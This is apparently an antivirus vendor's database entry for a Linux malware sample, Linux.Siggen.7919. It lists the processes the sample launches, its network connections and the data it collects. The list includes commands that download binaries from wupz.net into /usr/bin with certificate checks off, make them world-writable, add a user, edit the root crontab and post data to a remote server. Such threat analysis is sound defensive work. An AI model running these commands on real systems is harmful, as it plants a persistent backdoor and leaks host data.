Linux.Siggen.7919
Added to the Dr.Web virus database: 2024-08-11
Virus description added: 2024-08-10
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
Malicious functions:
Gains root privileges
Launches processes:
- apt update -y
- free -m
- /usr/bin/mawk awk {print $2,$3,$4}
- curl -s https://cdn-script.wupz.net/date.php
- bash -c lsb_release -d
- /usr/bin/mawk awk {print $2}
- clear
- /usr/bin/python3.9 /usr/bin/python3 -Es /usr/bin/lsb_release -d
- sudo useradd -s /bin/bash -d /home/wupz/ -m wupz
- grep Description
- apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
- df -h
- su -c lsb_release -d
- rm -rf /tmp/apt-key-gpghome.K8CdpK9l2R
- grep load
- curl -N -s -4 --data method=eski-ts3 https://cdn-script.wupz.net/method
- mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
- curl -N -s -4 --data method=sBot-356-TekPanel https://cdn-script.wupz.net/method
- chmod 700 /tmp/apt-key-gpghome.K8CdpK9l2R
- expr 10
- /usr/lib/apt/methods/store
- bash -c source /mnt/699 <SAMPLE_FULL_PATH>
- gpgv --homedir /tmp/apt-key-gpghome.K8CdpK9l2R --keyring /tmp/apt-key-gpghome.K8CdpK9l2R/docker.asc.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.vprxKX /tmp/apt.data.ftXjeW
- apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
- gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
- curl -N -s -4 --data method=yeni-ts3 https://cdn-script.wupz.net/method
- chmod 777 /usr/bin/wupz-check
- apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
- wget -q --no-check-certificate https:/wupz.net/wupz-check -O /usr/bin/wupz-check
- crontab -
- wget -q --no-check-certificate https://wupz.net/wupz -O /usr/bin/wupz
- /usr/lib/apt/methods/https
- apt-config shell GPGV Apt::Key::gpgvcommand
- curl -N -s -4 --data request=blacklist&sip=176.100.243.133 https://cdn-script.wupz.net/index
- curl -s https://cdn-script.wupz.net/news
- curl -N -s -4 --data method=teaspeak https://cdn-script.wupz.net/method
- /usr/bin/mawk awk /^-----BEGIN/{ x = 1; }\x0a/^$/{ if (x == 1) { x = 2; }; }\x0a/^[^=-]/{ if (x == 2) { print $0; }; }\x0a/^-----END/{ x = 0; }
- /bin/sh /usr/bin/apt-key --quiet --readonly --keyring /etc/apt/keyrings/docker.asc verify --status-fd 3 /tmp/apt.sig.vprxKX /tmp/apt.data.ftXjeW
- id -u
- /usr/bin/mawk awk { ip = $1 } END { print ip }
- gpg-connect-agent -s --no-autostart GETINFO scd_running /if ${! $?} scd killscd /end
- apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
- top -bn1
- curl -N -s -4 --data method=sBot-353-Limitsiz https://cdn-script.wupz.net/method
- curl -N -s -4 --data method=sBot-353-TekPanel https://cdn-script.wupz.net/method
- date +%d
- /usr/bin/dpkg --print-foreign-architectures
- /usr/bin/mawk awk {printf \x22%.2f\x22 $(NF-2)}
- /usr/bin/mawk awk $NF==\x22/\x22{printf \x22%d/%dGB (%s)\x22 $3,$2,$5}
- curl -s -4 https://cdn-script.wupz.net/ip.php
- /usr/bin/mawk awk NR==2{printf \x22%s/%sMB (%.2f%%)\x22 $3,$2,$3*100/$2}
- date +10.%m.%Y
- useradd -s /bin/bash -d /home/wupz/ -m wupz
- /bin/sh /usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.nFocpx /tmp/apt.data.gAsHkx
- sed -e s#\x27#\x27\x22\x27\x22\x27#g
- chmod 777 /usr/bin/wupz
- gpgconf --kill all
- base64 -d
- gpg-connect-agent --no-autostart KILLAGENT
- /usr/lib/apt/methods/http
- /usr/lib/apt/methods/gpgv
Kills the following processes:
Performs operations with the file system:
Network activity:
Establishes connection:
- 8.#.8.8:53
- 18#.##4.97.1:443
- (e##val)
- 18#.##4.96.1:443
- [2#####8c1:3121::1]:443
- [2#####8c1:3120::1]:443
- 18#.#14.96.1:0
- 18#.#14.97.1:0
- [2#####8c1:3121::1]:0
- [2#####8c1:3120::1]:0
- 15#.##1.246.132:80
- [2#####e42:3a::644]:80
- [2##########78f:8c00:3:db06:4200:93a1]:443
- [2##########78f:4e00:3:db06:4200:93a1]:443
- [2##########78f:7800:3:db06:4200:93a1]:443
- [2##########78f:6200:3:db06:4200:93a1]:443
- [2##########78f:fa00:3:db06:4200:93a1]:443
- [2##########78f:5a00:3:db06:4200:93a1]:443
- [2##########78f:f800:3:db06:4200:93a1]:443
- [2##########78f:5600:3:db06:4200:93a1]:443
- 3.###.206.39:443
- 3.###.206.102:443
- 3.###.206.5:443
- 3.###.206.93:443
DNS ASK:
- cd####ript.wupz.net
- wu##.net
- ww#.#upz.net
- https
- _h####.##cp.download.docker.com
- _h###.###p.security.debian.org
- _h###.##cp.deb.debian.org
- do####ad.docker.com
- de####.#ap.fastlydns.net
Sends data to the following servers:
- 18#.##4.97.1:443
- 18#.##4.96.1:443
- 15#.##1.246.132:80
- 3.###.206.39:443
Receives data from the following servers:
- 18#.##4.97.1:443
- 18#.##4.96.1:443
- 3.###.206.39:443
- 15#.##1.246.132:80
Other:
Collects OS information
Collects CPU information
Collects RAM information
Collects information about network activity
Curing recommendations
Linux